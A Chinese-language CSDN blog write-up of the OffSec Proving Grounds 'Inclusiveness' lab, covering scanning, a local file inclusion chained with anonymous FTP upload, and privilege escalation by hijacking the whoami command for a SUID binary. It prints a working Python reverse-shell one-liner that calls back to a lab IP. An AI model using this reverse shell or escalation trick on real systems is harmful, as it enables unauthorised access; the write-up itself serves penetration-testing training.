PG::Inclusiveness

最新推荐文章于 2024-07-06 14:42:08 发布
最新推荐文章于 2024-07-06 14:42:08 发布
阅读量286 收藏
点赞数
分类专栏: PROVING GROUNDS 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46743202/article/details/128040112
版权

nmap -Pn -p- -T4 --min-rate=1000 192.168.134.14
image.png
nmap -Pn -p 21,22,80 -sCV 192.168.134.14
image.png
80端口是默认页面,先查看21端口FTP服务的匿名登录,并未发现可利用信息。
继续查看80端口,在robots.txt中得到提示。
image.png
https://www.howtogeek.com/113439/how-to-change-your-browsers-user-agent-without-installing-any-extensions/
image.png
得到一个路径 /secret_information
image.png
得到一个本地文件包含漏洞
image.png
结合ftp服务,应该是包含ftp服务的内容
image.png
image.png
上传shell至ftp
image.png
image.png
反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.134",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")

image.png
查看SUID时,发现一个可能存在利用的地方
image.png
查看时,发现源代码
image.png
程序的大致意思是运行whoami检测用户身份,如果是Tom,则rootshell程序会给一个更高权限的用户。
所以只需要劫持whoami,让它输出Tom就可以了。
image.png

aya3t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Smart Business Intelligence Solutions with Microsoft SQL Server
10-10
inclusiveness—we have provided content targeted at both beginning and intermediate BI developers. We have also included information for business decision makers who wish to understand the ...
09 06cet4 AB卷答案
06-20
A卷 快速阅读: 1-7:1321431 8、very embarrasd 9、inclusiveness 10、differences and similarities
vulhub inclusiveness
hee_mee的博客
04-26 205
NIlZero
vulnhub inclusiveness: 1
箭雨镜屋
07-16 1071
nmap扫描 ---- 绕过非搜索引擎(User-Agent头)过滤读取robots.txt ---- 利用LFI和ftp匿名上传文件getshell ---- C语言代码审计提权
coldfusion_ColdFusion教程:第一部分
culh2177的博客
07-29 756
coldfusionThis tutorial series was originally written in 2001, and may be out of date. Since then we’ve published other ColdFusion tutorials that are more up to date. Here are some newer tutorials you...
林浩然与杨凌芸的Java奇缘:抽象类、接口与多态的编程三部曲
howard2005的专栏
02-07 919
在代码王国里,住着两位程序员明星——林浩然和杨凌芸。他们不仅是项目组里的核心力量,更是Java语言运用的大师级人物。他们的故事就像Java中的抽象类、接口与多态一样,充满智慧与变通。
Course Note 1 Module 1: Introduction to AI
走在新技术的野路子上
12-28 435
Learning Objectives Concepts followed: Lesson 1 AI Common AI Workloads AI in Azure Lesson 2 Responsible AI Chanllenges and Risks with AI Principles of Responsible AI Lesson 1 AI What is AI? Software that imitates human capabilities Software th..
LWN:代码中的幽默以及包容性!
Linux News搬运工
07-02 135
关注了就能看到更多这么棒的文章哦~Code humor and inclusivenessBy Jonathan CorbetJune 11, 2021DeepL assisted tra...
Effective Regression Test Case Selection: A Systematic Literature Review
04-11 388
摘要 本文研究了2007至2015年间47篇实证研究。其中39%的研究采用挖掘和基于学习的回归测试用例选择,18%关于单元级别的测试,26%使用面向对象的环境。只有39%的研究可以根据实验步骤进行复现。 这些报告使用了7种不同的开销指标,13种覆盖类型和5种错误检测指标。70%的研究使用开销作为有效性的度量,31%使用故障检测能力作为度量,16%使用覆盖率作为度量。 1. 绪论 IEEE定义回归测...
软件开发:研究保险软件系统数据一致性和整体性.pdf
09-07
Insurance software system architecture design should be holistic, with strong expandability, extensibility, connectivity and inclusiveness. 6. 数据仓库和标准化接口:统一数据仓库和标准化接口是解决...
现在,发现你的优势——一场优势的革命.pdf
11-21
* 包容(Inclusiveness):扩大圈子,喜欢团队活动,认为人的本质是相同的,从而避免排外团体。 8. 如何控制弱点: * 把事情做好点。 * 设计一个支持系统。 * 用你的优势主题来盖过你的弱点。 * 找一个伙伴。 ...
Conmi的正确答案——ESP32-C3开启安全下载模式
Conmi的博客
07-03 311
IDF版本:4.4.7。
安全隔离上网的有效途径:沙箱
Canon_YK的博客
07-01 562
沙箱技术,顾名思义,就像是在计算机系统中构建一个“沙箱”,将应用程序或系统进程的运行限制在这个“沙箱”内,使其无法访问或修改系统核心资源,从而达到隔离的效果。沙箱技术作为一种高效的隔离机制,为企业和个人提供了一种在享受网络便利的同时,保障系统安全的解决方案。浏览器级别沙箱是另一种常见的沙箱技术实现方式。目前也只有深信达的沙箱技术是可以运行和控制虚拟机的,将整个磁盘进行加密可以很好地进行控制,如果企业安全需求比较高可以采用全盘加密的方式,一般情况下隔离出虚拟空间的轻型沙箱就可以满足轻量化办公的需求。
Akamai+Noname强强联合 | API安全再加强
AKAMAI_CHINA的博客
07-03 1069
最近,Akamai正式完成了对Noname Security的收购。本文我们将向大家介绍,经过本次收购后,Akamai在保护API安全性方面的后续计划和未来愿景。Noname Security是市场上领先的API安全供应商之一,此次收购将让Akamai能更好地满足日益增长的客户需求和市场要求。具体来说,Akamai将能借助本次收购扩展API流量方面的情报,满足客户可能提出的,与业务、集成或部署要求有关的任何问题。
FMEA在大型光伏电站安全生产管理中的应用
tianxingjian713的博客
07-03 423
它通过对产品或过程中可能出现的故障模式进行系统性地梳理和分析,评估其可能的影响程度和发生概率,从而制定相应的预防措施和应对措施,以降低故障发生的可能性和影响程度。FMEA在光伏电站安全生产管理中的应用,主要是通过对电站系统、设备和工艺过程进行全面的故障分析,找出潜在的故障模式和影响,进而制定针对性的预防措施,提高电站的安全性和可靠性。然后,针对每个子系统和设备,分析其可能出现的故障模式及其影响,包括故障对电站运行的影响、对人员安全的影响以及对环境的影响等。在评估故障影响的基础上,需要制定相应的预防措施。
WebKit中的安全新纪元:Web Authentication API深度解析
2401_85763639的博客
07-03 674
Web Authentication API是一种新兴的Web标准,旨在使用公钥密码学提供更安全的登录和多因素认证方法。与传统的用户名和密码认证方式相比,WebAuthn提供了一种无密码的认证机制,从而减少了密码泄露和钓鱼攻击的风险。
[图解]SysML和EA建模住宅安全系统-08-安全企业用例图
rolt的专栏
07-03 683
因为主辅只是针对某个用例而言
[图解]SysML和EA建模住宅安全系统-11-接口块
最新发布
rolt的专栏
07-06 508
当然内部块图里面肯定要比这个丰富
AZ-140-117题5.31.pdf
06-27
The high coverage and inclusiveness of the Microsoft AZ-140 exam questions make it an ideal test for individuals looking to validate their skills and knowledge in Azure administration. The exam ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值